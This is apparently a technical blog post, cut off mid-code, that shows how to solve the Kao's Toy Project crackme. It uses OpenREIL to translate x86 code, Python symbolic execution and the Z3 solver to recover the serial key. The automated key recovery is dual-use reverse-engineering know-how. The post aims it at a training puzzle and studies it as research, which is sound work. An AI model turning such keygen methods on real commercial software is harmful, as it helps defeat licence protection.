Friday, March 20, 2015

Automated algebraic cryptanalysis with OpenREIL and Z3

One week ago I released my OpenREIL project, an open source implementation of the well-known Reverse Engineering Intermediate Language (REIL). The OpenREIL library has many more features than just binary to IR (intermediate representation) translation; you can check the documentation to learn how to use it and what it can do. In this blog post I want to demonstrate a practical example of using OpenREIL to solve Kao's Toy Project crackme puzzle with automated algebraic cryptanalysis.

Why use an intermediate representation


Intermediate representation of binary code is widely used in code analysis tools, mostly for the following reasons:
  • Binary code is complicated. For example, the IA-32 instruction set has more than a thousand instructions, while OpenREIL has only 23. Obviously, it is much easier to write a program that analyzes IR code than one that analyzes machine or assembly code.
  • Binary code has side effects. CPU instructions usually perform implicit operations like flags computation, and there are a lot of complex instructions that belong to the CISC or SIMD classes. For example, here is the BAP IR representation of the add rbx, rax x86 instruction; it looks much more complex than the original assembly instruction, right?
    addr 0x0 @asm "add %rax,%rbx"
    label pc_0x0
    T_t1:u64 = R_RBX:u64
    T_t2:u64 = R_RAX:u64
    R_RBX:u64 = R_RBX:u64 + T_t2:u64
    R_CF:bool = R_RBX:u64 < T_t1:u64
    R_OF:bool = high:bool((T_t1:u64 ^ ~T_t2:u64) & (T_t1:u64 ^ R_RBX:u64))
    R_AF:bool = 0x10:u64 == (0x10:u64 & (R_RBX:u64 ^ T_t1:u64 ^ T_t2:u64))
    R_PF:bool =
      ~low:bool(let T_acc:u64 := R_RBX:u64 >> 4:u64 ^ R_RBX:u64 in
                let T_acc:u64 := T_acc:u64 >> 2:u64 ^ T_acc:u64 in
                T_acc:u64 >> 1:u64 ^ T_acc:u64)
    R_SF:bool = high:bool(R_RBX:u64)
    R_ZF:bool = 0:u64 == R_RBX:u64
  • There are a lot of different processor architectures on the market. Using an intermediate representation allows you to make your code analysis logic architecture independent. Currently OpenREIL supports only i386 (please note that it's a very early release ☺), but in the near future I'm planning to add x86_64 and ARM as well. It will be relatively easy because all of these architectures are supported by VEX (a part of Valgrind which is used in OpenREIL).
As you can see, binary to IR translation is definitely a must-have technology for any advanced binary code analysis tool that does decompilation, deobfuscation or automated vulnerability discovery. Without a proper IR translation layer it would be horribly hard to implement things like symbolic execution, abstract interpretation and many others.
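
To make the "side effects" point concrete, here is a minimal Python 3 sketch that mirrors the BAP IR listing for add rbx, rax statement by statement. The function name add64_with_flags is hypothetical (it is not part of BAP or OpenREIL); the sketch only illustrates how much implicit state a single add instruction updates.

```python
MASK64 = (1 << 64) - 1

def add64_with_flags(rbx, rax):
    """Emulate `add rbx, rax`; return (result, flags) following the IR listing."""
    t1, t2 = rbx & MASK64, rax & MASK64
    res = (t1 + t2) & MASK64

    # parity of the low byte, folded the same way as T_acc in the listing
    acc = (res >> 4) ^ res
    acc = (acc >> 2) ^ acc
    acc = (acc >> 1) ^ acc

    flags = {
        'CF': res < t1,
        'OF': bool((((t1 ^ (~t2 & MASK64)) & (t1 ^ res)) >> 63) & 1),
        'AF': ((res ^ t1 ^ t2) & 0x10) == 0x10,
        'PF': (acc & 1) == 0,
        'SF': bool(res >> 63),
        'ZF': res == 0,
    }
    return res, flags

res, flags = add64_with_flags(0x7fffffffffffffff, 1)
print(hex(res), sorted(name for name, is_set in flags.items() if is_set))
```

An analysis tool that works on raw machine code has to know all of this for every instruction, while an IR spells it out as ordinary assignments.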

Kao's Toy Project


To demonstrate the power of OpenREIL let's solve Kao's Toy Project crackme. The following code is the essence of this crackme; it's actually a simple stream cipher with a 64-bit key:
void expand(u8 out[32], const u8 in[32], u32 x, u32 y)  
{  
    for (u32 i = 0; i < 32; ++i)  
    {  
        out[i] = (in[i] - x) ^ y;

        x = ROL(x, 1);  
        y = ROL(y, 1);  
    }  
}

It accepts a 32-byte plain text as in, the cipher key as two 32-bit unsigned integers x and y, and produces a 32-byte ciphered text out. Kao's Toy Project uses the installation ID as plain text, the serial number entered by the user as x and y, and then compares the encryption result with a hardcoded ciphered text.
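
For experimenting without the binary, the C function above can be ported to Python 3 almost line by line. This is only a sketch: rol32 stands in for the ROL macro that the C snippet assumes, and the sample key and plain text below are arbitrary values, not data from the crackme.

```python
def rol32(value, count):
    """Rotate a 32-bit value left by count bits."""
    count %= 32
    value &= 0xffffffff
    return ((value << count) | (value >> (32 - count))) & 0xffffffff

def expand(data, x, y):
    """Python port of expand(): returns the ciphered bytes for data."""
    out = bytearray()
    for byte in data:
        # only the low 8 bits of x and y affect the current byte
        out.append(((byte - x) ^ y) & 0xff)
        x, y = rol32(x, 1), rol32(y, 1)
    return bytes(out)

plain = bytes(range(32))
ciphered = expand(plain, 0x12345678, 0x9abcdef0)
print(ciphered.hex())
```

Note that the key words return to their initial values after 32 rotations, so every bit of x and y is used at each of the eight bit positions of some byte.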

To solve the puzzle you need to recover the encryption key for the given function, knowing the plain text and the ciphered text. Neither the solution nor the cipher itself is as simple as it might seem at first look; a paper that describes solving this puzzle was published by Dcoder in 2012 [PDF]:


First, try to solve the problem by hand a bit to develop a feel of the difficulty of the problem. For any single byte pair of plaintext and ciphertext (pi, ci) it’s quite easy to find 8 bits within the key so that the mapping is correct. In fact, you can choose ANY byte in EBX to subtract, since you can adjust the difference via the xor by the corresponding byte in EDX.
The value of the key for each byte mapping is completely open ended (256 possibilities). But actually choosing a value for the key for that mapping propagates a constraint across the possibilities of the other parts of the key. And this is the beauty of the algorithm.
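
The observation in the quote is easy to check by brute force. The following Python 3 sketch (the helper name matching_xor_byte and the sample bytes are made up for illustration) shows that for a single plaintext/ciphertext byte pair every candidate for the subtracted key byte has exactly one matching XOR byte:

```python
def matching_xor_byte(p, c, sub_byte):
    """XOR byte that maps plaintext byte p to ciphertext byte c
    after sub_byte has been subtracted from p."""
    return ((p - sub_byte) & 0xff) ^ c

# arbitrary plaintext byte and an arbitrary target ciphertext byte
p, c = 0x41, ord('0')

pairs = [(s, matching_xor_byte(p, c, s)) for s in range(256)]

# every one of the 256 candidates really encrypts p to c
assert all((((p - s) & 0xff) ^ x) == c for s, x in pairs)
print(len(pairs), 'valid (sub, xor) byte pairs for a single position')
```

Because both key words are rotated by one bit per byte, the key bytes used at position i+1 share seven bits with the key bytes used at position i, and this is where the constraint propagation described in the quote comes from.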




Later, after the publication, Rolf Rolles released his own solution of this crackme; he used a Satisfiability Modulo Theories (SMT) formula and an SMT solver to achieve the solution. The formula does not explicitly take advantage of any aforementioned, known flaw in the cryptosystem, and instead encodes the algorithm literally. Symbolic execution was used to produce the formula automatically. Rolf also made a video demo with a detailed explanation of all the steps needed to solve the puzzle (trace generation, trace simplification, SMT constraints generation and solving). Unfortunately Rolf didn't publish the full code, but there are enough technical details to understand how his solution works.

Also, in 2013 Georgy Nosenko presented his work "SMT Solvers for Software Security" where BAP was used for automated keygen generation for Kao's Toy Project. I believe it might be a good tradition among security researchers to solve this nifty crackme to demonstrate the applied use of code analysis tools or frameworks ☺

Using OpenREIL for symbolic execution


Here is the disassembled code of the check_serial() function that checks the entered key:
.text:004010EC check_serial    proc near
.text:004010EC
.text:004010EC text_ciphered   = byte ptr -21h
.text:004010EC X               = dword ptr  8
.text:004010EC Y               = dword ptr  0Ch
.text:004010EC
.text:004010EC                 push    ebp
.text:004010ED                 mov     ebp, esp
.text:004010EF                 add     esp, 0FFFFFFDCh
.text:004010F2                 mov     ecx, 20h
.text:004010F7                 mov     esi, offset installation_ID
.text:004010FC                 lea     edi, [ebp+text_ciphered]
.text:004010FF                 mov     edx, [ebp+X]
.text:00401102                 mov     ebx, [ebp+Y]
.text:00401105
.text:00401105 loc_401105:
.text:00401105                 lodsb
.text:00401106                 sub     al, bl
.text:00401108                 xor     al, dl
.text:0040110A                 stosb
.text:0040110B                 rol     edx, 1
.text:0040110D                 rol     ebx, 1
.text:0040110F                 loop    loc_401105
.text:00401111                 mov     byte ptr [edi], 0
.text:00401114                 push    offset text_valid ; "0how4zdy81jpe5xfu92kar6cgiq3lst7"
.text:00401119                 lea     eax, [ebp+text_ciphered]
.text:0040111C                 push    eax
.text:0040111D                 call    lstrcmpA
.text:00401122                 leave
.text:00401123                 retn    8
.text:00401123 check_serial    endp

As you can see, the instruction at 004010F7 loads the plain text pointer into the ESI register, then the instruction at 004010FC loads a pointer to the stack buffer for the ciphered text into the EDI register; the encryption key entered by the user is stored in the EDX and EBX registers. Instructions from 00401105 to 0040110F run 32 encryption rounds, one for each byte of the input data. At the end of the function, at instruction 0040111D, lstrcmpA() is called to compare the computed ciphered text with the reference value text_valid that is hardcoded into the binary. The entered encryption key is valid when they are equal.

We are going to write a program that analyses Kao's binary and generates a correct key for the given installation ID, mostly in the same way as Rolf did. Here is the list of steps that we need to do:
  1. Translate the check_serial() function into REIL and apply some code optimizations to eliminate unused x86 flags computations, etc.
  2. Mark the EDX and EBX registers as symbolic, initialize emulator memory with the required global variables (text_valid, installation_ID) and run symbolic execution of our function. At the end of the symbolic execution, the text_ciphered buffer contents will be represented by 32 symbolic expressions (one for each byte) that accept the EDX and EBX variables as input arguments.
  3. Generate SMT constraints for the obtained expressions by equating them with the bytes of text_valid.
  4. Feed the generated constraints to the Microsoft Z3 SMT solver using the z3py API, ask the solver to check constraint satisfiability and produce valid input for EDX and EBX.
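
Before automating anything, steps 3 and 4 can be tried by hand. The Python 3 sketch below is not the OpenREIL-based solution: it encodes the cipher directly as Z3 bit vector constraints instead of deriving them from REIL, and the names encrypt and recover_key, as well as the sample key and plain text, are assumptions made for illustration. The z3 import is guarded so that the script still runs (and simply finds no key) when the bindings are not installed.

```python
try:
    import z3
except ImportError:          # Z3 bindings are optional for this sketch
    z3 = None

def encrypt(data, x, y):
    """Reference cipher: out[i] = (in[i] - x) ^ y, then rotate both key words."""
    x, y = x & 0xffffffff, y & 0xffffffff
    out = bytearray()
    for byte in data:
        out.append(((byte - x) ^ y) & 0xff)
        x = ((x << 1) | (x >> 31)) & 0xffffffff
        y = ((y << 1) | (y >> 31)) & 0xffffffff
    return bytes(out)

def recover_key(plain, ciphered):
    """Return some (x, y) with encrypt(plain, x, y) == ciphered, or None."""
    if z3 is None:
        return None
    x, y = z3.BitVec('x', 32), z3.BitVec('y', 32)
    solver = z3.Solver()
    kx, ky = x, y
    for p, c in zip(plain, ciphered):
        # one 8-bit constraint per output byte
        out = (z3.BitVecVal(p, 8) - z3.Extract(7, 0, kx)) ^ z3.Extract(7, 0, ky)
        solver.add(out == z3.BitVecVal(c, 8))
        kx, ky = z3.RotateLeft(kx, 1), z3.RotateLeft(ky, 1)
    if solver.check() != z3.sat:
        return None
    model = solver.model()
    return (model.eval(x, model_completion=True).as_long(),
            model.eval(y, model_completion=True).as_long())

plain = bytes(range(32))
ciphered = encrypt(plain, 0xdeadbeef, 0x0badf00d)
key = recover_key(plain, ciphered)
if key is not None:
    # the solver may return a different key that produces the same output
    assert encrypt(plain, *key) == ciphered
    print('recovered key: %.8X %.8X' % key)
```

The rest of this post produces equivalent constraints automatically from the binary, without a hand-written model of the cipher.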


Let's do the first step with OpenREIL Python API:
from pyopenreil.REIL import *
from pyopenreil.symbolic import *
from pyopenreil.VM import *

from pyopenreil.utils import bin_PE

# VA's of required functions and variables
check_serial = 0x004010EC        
installation_ID = 0x004093A8        

# create translator instance
tr = CodeStorageTranslator(bin_PE.Reader('toyproject.exe'))

# construct data flow graph of check_serial() function
dfg = DFGraphBuilder(tr).traverse(check_serial)

# Run all available code optimizations and update 
# storage with new function code.
dfg.optimize_all(tr.storage)

# print generated IR code
print tr.get_func(check_serial)

Generated IR code:
; sub_004010ec()
; Code chunks: 0x4010ec-0x401125
; --------------------------------
;
; asm: push ebp
; data (1): 55
;
004010ec.00     SUB         R_ESP:32,             4:32,         R_ESP:32
004010ec.01     STM         R_EBP:32,                 ,         R_ESP:32
;
; asm: mov ebp, esp
; data (2): 8b ec
;
004010ed.00     STR         R_ESP:32,                 ,         R_EBP:32
;
; asm: add esp, -0x24
; data (3): 83 c4 dc
;
004010ef.00     ADD         R_ESP:32,      ffffffdc:32,         R_ESP:32
;
; asm: mov ecx, 0x20
; data (5): b9 20 00 00 00
;
004010f2.00     STR            20:32,                 ,         R_ECX:32
;
; asm: mov esi, 0x4093a8
; data (5): be a8 93 40 00
;
004010f7.00     STR        4093a8:32,                 ,         R_ESI:32
;
; asm: lea edi, dword ptr [ebp + 0xffffffdf]
; data (3): 8d 7d df
;
004010fc.00     ADD         R_EBP:32,      ffffffdf:32,         R_EDI:32
;
; asm: mov edx, dword ptr [ebp + 8]
; data (3): 8b 55 08
;
004010ff.00     ADD         R_EBP:32,             8:32,          V_01:32
004010ff.01     LDM          V_01:32,                 ,         R_EDX:32
;
; asm: mov ebx, dword ptr [ebp + 0xc]
; data (3): 8b 5d 0c
;
00401102.00     ADD         R_EBP:32,             c:32,          V_01:32
00401102.01     LDM          V_01:32,                 ,         R_EBX:32
;
; asm: lodsb al, byte ptr [esi]
; data (1): ac
;
00401105.00     LDM         R_ESI:32,                 ,           V_02:8
00401105.01     AND         R_EAX:32,      ffffff00:32,          V_03:32
00401105.02      OR           V_02:8,              0:8,          V_04:32
00401105.03      OR          V_03:32,          V_04:32,         R_EAX:32
00401105.04     ADD         R_ESI:32,       R_DFLAG:32,         R_ESI:32
;
; asm: sub al, bl
; data (2): 2a c3
;
00401106.00     AND         R_EAX:32,            ff:32,           V_00:8
00401106.01     AND         R_EBX:32,            ff:32,           V_01:8
00401106.02     SUB           V_00:8,           V_01:8,           V_02:8
00401106.03     AND         R_EAX:32,      ffffff00:32,          V_05:32
00401106.04      OR           V_02:8,              0:8,          V_06:32
00401106.05      OR          V_05:32,          V_06:32,         R_EAX:32
;
; asm: xor al, dl
; data (2): 32 c2
;
00401108.00     AND         R_EAX:32,            ff:32,           V_00:8
00401108.01     AND         R_EDX:32,            ff:32,           V_01:8
00401108.02     XOR           V_00:8,           V_01:8,           V_02:8
00401108.03     AND         R_EAX:32,      ffffff00:32,          V_04:32
00401108.04      OR           V_02:8,              0:8,          V_05:32
00401108.05      OR          V_04:32,          V_05:32,         R_EAX:32
;
; asm: stosb byte ptr es:[edi], al
; data (1): aa
;
0040110a.00     AND         R_EAX:32,            ff:32,           V_01:8
0040110a.01     STM           V_01:8,                 ,         R_EDI:32
0040110a.02     ADD         R_EDI:32,       R_DFLAG:32,         R_EDI:32
;
; asm: rol edx, 1
; data (2): d1 c2
;
0040110b.00      OR             1f:8,              0:8,          V_01:32
0040110b.01     SHR         R_EDX:32,          V_01:32,          V_02:32
0040110b.02      OR              1:8,              0:8,          V_03:32
0040110b.03     SHL         R_EDX:32,          V_03:32,          V_04:32
0040110b.04      OR          V_04:32,          V_02:32,         R_EDX:32
;
; asm: rol ebx, 1
; data (2): d1 c3
;
0040110d.00      OR             1f:8,              0:8,          V_01:32
0040110d.01     SHR         R_EBX:32,          V_01:32,          V_02:32
0040110d.02      OR              1:8,              0:8,          V_03:32
0040110d.03     SHL         R_EBX:32,          V_03:32,          V_04:32
0040110d.04      OR          V_04:32,          V_02:32,         R_EBX:32
;
; asm: loop -0xa
; data (2): e2 f4
;
0040110f.00     SUB         R_ECX:32,             1:32,         R_ECX:32
0040110f.01      EQ         R_ECX:32,             0:32,           V_03:1
0040110f.02     NOT           V_03:1,                 ,           V_02:1
0040110f.03     JCC           V_02:1,                 ,        401105:32
0040110f.04     JCC              1:1,                 ,        401111:32
;
; asm: mov byte ptr [edi], 0
; data (3): c6 07 00
;
00401111.00     STM              0:8,                 ,         R_EDI:32
;
; asm: push 0x409185
; data (5): 68 85 91 40 00
;
00401114.00     SUB         R_ESP:32,             4:32,         R_ESP:32
00401114.01     STM        409185:32,                 ,         R_ESP:32
;
; asm: lea eax, dword ptr [ebp + 0xffffffdf]
; data (3): 8d 45 df
;
00401119.00     ADD         R_EBP:32,      ffffffdf:32,         R_EAX:32
;
; asm: push eax
; data (1): 50
;
0040111c.00     SUB         R_ESP:32,             4:32,         R_ESP:32
0040111c.01     STM         R_EAX:32,                 ,         R_ESP:32
;
; asm: call 0x1f1
; data (5): e8 ec 01 00 00
;
0040111d.00     SUB         R_ESP:32,             4:32,         R_ESP:32
0040111d.01     STM        401122:32,                 ,         R_ESP:32
0040111d.02     JCC              1:1,                 ,        40130e:32
;
; asm: leave
; data (1): c9
;
00401122.00     STR         R_EBP:32,                 ,          V_00:32
00401122.01     LDM          V_00:32,                 ,         R_EBP:32
00401122.02     ADD          V_00:32,             4:32,         R_ESP:32
;
; asm: ret 8
; data (3): c2 08 00
;
00401123.00     LDM         R_ESP:32,                 ,          V_01:32
00401123.01     ADD         R_ESP:32,             c:32,         R_ESP:32
00401123.02     JCC              1:1,                 ,          V_01:32

Unfortunately the current version of OpenREIL doesn't have a symbolic execution implementation yet, but it provides an API for constructing symbolic expressions and for IR code emulation, which is enough to implement symbolic execution on top of the pyopenreil.VM module by extending the VM.Math, VM.Mem, VM.Reg and VM.Cpu classes.

Normally, each register of VM.Cpu (which is represented by VM.Reg) keeps its current value as a Python long, but our new class that inherits VM.Reg uses a Val object to store the register value. It has two fields, Val.val and Val.exp: a not None value of val indicates a concrete value (just like the value of a real CPU register), while a None value of val indicates a symbolic value whose expression is stored in exp.

Source code of these two classes:
class Val(object):

    def __init__(self, val = UNDEF, exp = None):

        self.val, self.exp = val, exp

    def __str__(self):

        return str(self.exp) if self.is_symbolic() else hex(self.val)

    def is_symbolic(self):

        # check if value is symbolic
        return self.val is None

    def is_concrete(self):

        # check if value is concrete
        return not self.is_symbolic()

    def to_z3(self, state, size):

        #
        # generate Z3 expression that represents this value
        #

        def _z3_size(size):

            return { U1: 1, U8: 8, U16: 16, U32: 32, U64: 64 }[ size ]

        def _z3_exp(exp, size):

            if isinstance(exp, SymVal):

                if state.has_key(exp.name):

                    return state[exp.name]

                else:

                    return z3.BitVec(exp.name, _z3_size(exp.size))                                 

            elif isinstance(exp, SymConst):

                return z3.BitVecVal(exp.val, _z3_size(exp.size))                

            elif isinstance(exp, SymExp):

                a, b = exp.a, exp.b

                assert isinstance(a, SymVal) or isinstance(a, SymConst)
                assert b is None or isinstance(b, SymVal) or isinstance(b, SymConst)
                assert b is None or a.size == b.size                

                a = a if a is None else _z3_exp(a, a.size)
                b = b if b is None else _z3_exp(b, b.size)                     

                # makes 1 bit bitvectors from booleans
                _z3_bool_to_bv = lambda exp: z3.If(exp, z3.BitVecVal(1, 1), z3.BitVecVal(0, 1))

                # z3 expression from SymExp
                ret = { I_ADD: lambda: a + b,
                        I_SUB: lambda: a - b,            
                        I_NEG: lambda: -a,
                        I_MUL: lambda: a * b,
                        I_DIV: lambda: z3.UDiv(a, b),
                        I_MOD: lambda: z3.URem(a, b),
                        I_SHR: lambda: z3.LShR(a, b),
                        I_SHL: lambda: a << b,                     
                         I_OR: lambda: a | b,
                        I_AND: lambda: a & b,
                        I_XOR: lambda: a ^ b,
                        I_NOT: lambda: ~a,
                         I_EQ: lambda: _z3_bool_to_bv(a == b),
                         I_LT: lambda: _z3_bool_to_bv(z3.ULT(a, b)) }[exp.op]()

                size_src = _z3_size(exp.a.size)
                size_dst = _z3_size(size)

                if size_src > size_dst:

                    # convert to smaller value
                    return z3.Extract(size_dst - 1, 0, ret)

                elif size_src < size_dst:

                    # convert to bigger value
                    return z3.Concat(z3.BitVecVal(0, size_dst - size_src), ret)

                else:

                    return ret

            else:

                assert False    

        if self.is_concrete():

            # use concrete value
            return z3.BitVecVal(self.val, _z3_size(size))

        else:

            # build Z3 expression
            return _z3_exp(self.exp, size)


class Reg(VM.Reg):

    def to_symbolic(self):

        # get symbolic representation of register contents
        if self.val.is_concrete():

            # use concrete value
            return SymConst(self.get_val(), self.size)

        else:

            if self.regs_map.has_key(self.name):

                return SymVal(self.regs_map[self.name], self.size)

            # use symbolic value
            return SymVal(self.name, self.size) if self.val.exp is None \
                                                else self.val.exp    

    def get_val(self):

        # get concrete value of the register if it's available
        assert self.val.is_concrete()
        
        return super(Reg, self).get_val(self.val.val)

    def str_val(self):

        return str(self.val.exp) if self.val.is_symbolic() \
                                 else super(Reg, self).str_val(self.val.val)

Example of concrete value initialization:
val = Val(0x1337L)

Example of symbolic value initialization:
val = Val(exp = SymVal('R_EAX', U32) + SymConst(1L, U32))

The engine computes concrete values during execution of IR instructions whenever possible, but when it meets an instruction that accepts a symbolic value as input, the result of its execution will be symbolic. Handling of most of the IR instructions is implemented in the VM.Math class; here is the source code of the symbolic class inherited from it:
class Math(VM.Math):

    def eval(self, op, a = None, b = None):

        concrete = True

        a_val = a if a is None else a.val
        b_val = b if b is None else b.val

        # determinate symbolic/concrete operation mode
        if a_val is not None and a_val.is_symbolic(): concrete = False
        if b_val is not None and b_val.is_symbolic(): concrete = False        

        if concrete:

            a_reg = a if a is None else VM.Reg(a.size, a.get_val())
            b_reg = b if b is None else VM.Reg(b.size, b.get_val())

            # compute and return concrete value
            return Val(val = super(Math, self).eval(op, a_reg, b_reg))

        else:

            assert a is not None
            assert op in [ I_STR, I_NOT ] or b is not None            

            # get symbolic representation of the arguments
            a_sym = a if a is None else a.to_symbolic()
            b_sym = b if b is None else b.to_symbolic()

            # make a symbolic expression
            exp = a_sym if op == I_STR else SymExp(op, a_sym, b_sym)

            # return symbolic value
            return Val(exp = exp)
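
The same concrete-or-symbolic dispatch rule can be shown without pyopenreil at all. The following self-contained sketch is a toy stand-in, not the classes above: Value and eval_add are hypothetical names, and symbolic expressions are kept as plain strings instead of SymExp objects.

```python
class Value(object):
    """Either a concrete integer (val) or a symbolic expression string (exp)."""

    def __init__(self, val=None, exp=None):
        self.val, self.exp = val, exp

    def is_symbolic(self):
        return self.val is None

    def __str__(self):
        return self.exp if self.is_symbolic() else hex(self.val)

def eval_add(a, b, bits=32):
    """ADD that stays concrete only when both inputs are concrete."""
    if not a.is_symbolic() and not b.is_symbolic():
        return Value(val=(a.val + b.val) & ((1 << bits) - 1))
    # at least one symbolic input makes the whole result symbolic
    return Value(exp='(%s + %s)' % (a, b))

print(eval_add(Value(0x1337), Value(1)))          # prints 0x1338
print(eval_add(Value(exp='R_EAX'), Value(1)))     # prints (R_EAX + 0x1)
```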

The symbolic version of the VM.Mem class also uses Val objects to represent each byte of the emulator's memory. Currently my symbolic memory model is far from perfect, but in the case of Kao's crackme it's good enough to track values and expressions across memory reads and writes. The symbolic version of VM.Cpu collects all register value assignments in SSA form and saves them to a list that is available as the VM.Cpu.regs_list field. Here is the execution trace of check_serial():
R_EIP_0_0_0 = 0x0
R_DFLAG_0_0_0 = 0x1
R_EAX_0_0_0 = 0x0
R_EBP_0_0_0 = 0x42424242
R_ESP_0_0_0 = 0x12000ff4
R_EIP_0_0_1 = 0x4010ec
R_ESP_4010ec_0_0 = 0x12000ff0L
R_EIP_4010ec_0_0 = 0x4010ecL
R_EIP_4010ec_1_0 = 0x4010edL
R_EBP_4010ed_0_0 = 0x12000ff0L
R_EIP_4010ed_0_0 = 0x4010efL
R_ESP_4010ef_0_0 = 0x12000fccL
R_EIP_4010ef_0_0 = 0x4010f2L
R_ECX_4010f2_0_0 = 0x20L
R_EIP_4010f2_0_0 = 0x4010f7L
R_ESI_4010f7_0_0 = 0x4093a8L
R_EIP_4010f7_0_0 = 0x4010fcL
R_EDI_4010fc_0_0 = 0x12000fcfL
R_EIP_4010fc_0_0 = 0x4010ffL
V_01_4010ff_0_0 = 0x12000ff8L
R_EIP_4010ff_0_0 = 0x4010ffL
R_EDX_4010ff_1_0 = ONE
R_EIP_4010ff_1_0 = 0x401102L
V_01_401102_0_0 = 0x12000ffcL
R_EIP_401102_0_0 = 0x401102L
R_EBX_401102_1_0 = TWO
R_EIP_401102_1_0 = 0x401105L
V_02_401105_0_0 = 0x0
R_EIP_401105_0_0 = 0x401105L
V_03_401105_1_0 = 0x0L
R_EIP_401105_1_0 = 0x401105L
V_04_401105_2_0 = 0x0L
R_EIP_401105_2_0 = 0x401105L
R_EAX_401105_3_0 = 0x0L
R_EIP_401105_3_0 = 0x401105L
R_ESI_401105_4_0 = 0x4093a9L
R_EIP_401105_4_0 = 0x401106L
V_00_401106_0_0 = 0x0L
R_EIP_401106_0_0 = 0x401106L
V_01_401106_1_0 = (R_EBX_401102_1_0 & 0xff)
R_EIP_401106_1_0 = 0x401106L
V_02_401106_2_0 = (0x0 - V_01_401106_1_0)
R_EIP_401106_2_0 = 0x401106L
V_05_401106_3_0 = 0x0L
R_EIP_401106_3_0 = 0x401106L
V_06_401106_4_0 = (V_02_401106_2_0 | 0x0)
R_EIP_401106_4_0 = 0x401106L
R_EAX_401106_5_0 = (0x0 | V_06_401106_4_0)
R_EIP_401106_5_0 = 0x401108L
V_00_401108_0_0 = (R_EAX_401106_5_0 & 0xff)
R_EIP_401108_0_0 = 0x401108L
V_01_401108_1_0 = (R_EDX_4010ff_1_0 & 0xff)
R_EIP_401108_1_0 = 0x401108L
V_02_401108_2_0 = (V_00_401108_0_0 ^ V_01_401108_1_0)
R_EIP_401108_2_0 = 0x401108L
V_04_401108_3_0 = (R_EAX_401106_5_0 & 0xffffff00)
R_EIP_401108_3_0 = 0x401108L
V_05_401108_4_0 = (V_02_401108_2_0 | 0x0)
R_EIP_401108_4_0 = 0x401108L
R_EAX_401108_5_0 = (V_04_401108_3_0 | V_05_401108_4_0)
R_EIP_401108_5_0 = 0x40110aL
V_01_40110a_0_0 = (R_EAX_401108_5_0 & 0xff)
R_EIP_40110a_0_0 = 0x40110aL
R_EIP_40110a_1_0 = 0x40110aL
R_EDI_40110a_2_0 = 0x12000fd0L
R_EIP_40110a_2_0 = 0x40110bL
V_01_40110b_0_0 = 0x1fL
R_EIP_40110b_0_0 = 0x40110bL
V_02_40110b_1_0 = (R_EDX_4010ff_1_0 >> 0x1f)
R_EIP_40110b_1_0 = 0x40110bL
V_03_40110b_2_0 = 0x1L
R_EIP_40110b_2_0 = 0x40110bL
V_04_40110b_3_0 = (R_EDX_4010ff_1_0 << 0x1)
R_EIP_40110b_3_0 = 0x40110bL
R_EDX_40110b_4_0 = (V_04_40110b_3_0 | V_02_40110b_1_0)
R_EIP_40110b_4_0 = 0x40110dL
V_01_40110d_0_0 = 0x1fL
R_EIP_40110d_0_0 = 0x40110dL
V_02_40110d_1_0 = (R_EBX_401102_1_0 >> 0x1f)
R_EIP_40110d_1_0 = 0x40110dL
V_03_40110d_2_0 = 0x1L
R_EIP_40110d_2_0 = 0x40110dL
V_04_40110d_3_0 = (R_EBX_401102_1_0 << 0x1)
R_EIP_40110d_3_0 = 0x40110dL
R_EBX_40110d_4_0 = (V_04_40110d_3_0 | V_02_40110d_1_0)
R_EIP_40110d_4_0 = 0x40110fL
R_ECX_40110f_0_0 = 0x1fL
R_EIP_40110f_0_0 = 0x40110fL
V_03_40110f_1_0 = 0x0
R_EIP_40110f_1_0 = 0x40110fL
V_02_40110f_2_0 = 0x1
R_EIP_40110f_2_0 = 0x40110fL
V_02_401105_0_1 = 0x1
R_EIP_401105_0_1 = 0x401105L
V_03_401105_1_1 = (R_EAX_401108_5_0 & 0xffffff00)
R_EIP_401105_1_1 = 0x401105L
V_04_401105_2_1 = 0x1L
R_EIP_401105_2_1 = 0x401105L
R_EAX_401105_3_1 = (V_03_401105_1_1 | 0x1)
R_EIP_401105_3_1 = 0x401105L
R_ESI_401105_4_1 = 0x4093aaL
R_EIP_401105_4_1 = 0x401106L
V_00_401106_0_1 = (R_EAX_401105_3_1 & 0xff)
R_EIP_401106_0_1 = 0x401106L
V_01_401106_1_1 = (R_EBX_40110d_4_0 & 0xff)
R_EIP_401106_1_1 = 0x401106L
V_02_401106_2_1 = (V_00_401106_0_1 - V_01_401106_1_1)
R_EIP_401106_2_1 = 0x401106L
V_05_401106_3_1 = (R_EAX_401105_3_1 & 0xffffff00)
R_EIP_401106_3_1 = 0x401106L
V_06_401106_4_1 = (V_02_401106_2_1 | 0x0)
R_EIP_401106_4_1 = 0x401106L
R_EAX_401106_5_1 = (V_05_401106_3_1 | V_06_401106_4_1)
R_EIP_401106_5_1 = 0x401108L
V_00_401108_0_1 = (R_EAX_401106_5_1 & 0xff)
R_EIP_401108_0_1 = 0x401108L
V_01_401108_1_1 = (R_EDX_40110b_4_0 & 0xff)
R_EIP_401108_1_1 = 0x401108L
V_02_401108_2_1 = (V_00_401108_0_1 ^ V_01_401108_1_1)
R_EIP_401108_2_1 = 0x401108L
V_04_401108_3_1 = (R_EAX_401106_5_1 & 0xffffff00)
R_EIP_401108_3_1 = 0x401108L
V_05_401108_4_1 = (V_02_401108_2_1 | 0x0)
R_EIP_401108_4_1 = 0x401108L
R_EAX_401108_5_1 = (V_04_401108_3_1 | V_05_401108_4_1)
R_EIP_401108_5_1 = 0x40110aL
V_01_40110a_0_1 = (R_EAX_401108_5_1 & 0xff)
R_EIP_40110a_0_1 = 0x40110aL
R_EIP_40110a_1_1 = 0x40110aL
R_EDI_40110a_2_1 = 0x12000fd1L
R_EIP_40110a_2_1 = 0x40110bL
V_01_40110b_0_1 = 0x1fL
R_EIP_40110b_0_1 = 0x40110bL
V_02_40110b_1_1 = (R_EDX_40110b_4_0 >> 0x1f)
R_EIP_40110b_1_1 = 0x40110bL
V_03_40110b_2_1 = 0x1L
R_EIP_40110b_2_1 = 0x40110bL
V_04_40110b_3_1 = (R_EDX_40110b_4_0 << 0x1)
R_EIP_40110b_3_1 = 0x40110bL
R_EDX_40110b_4_1 = (V_04_40110b_3_1 | V_02_40110b_1_1)

... around 2000 other items were skipped,
the full trace is here

The symbolic CPU class also has a to_z3() method that returns a representation of the trace as a list of Z3 bit vector expressions.
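
Since every trace entry is a plain SSA assignment, the trace can also be replayed in order once concrete inputs are chosen. The Python 3 sketch below does this with ordinary integers instead of Z3 bit vectors for three entries of the first rol edx, 1 from the trace above. The tuple encoding and the replay() helper are assumptions made for illustration, not part of the pyopenreil API.

```python
import operator

MASK32 = 0xffffffff

OPS = {
    '>>': operator.rshift,
    '<<': operator.lshift,
    '|': operator.or_,
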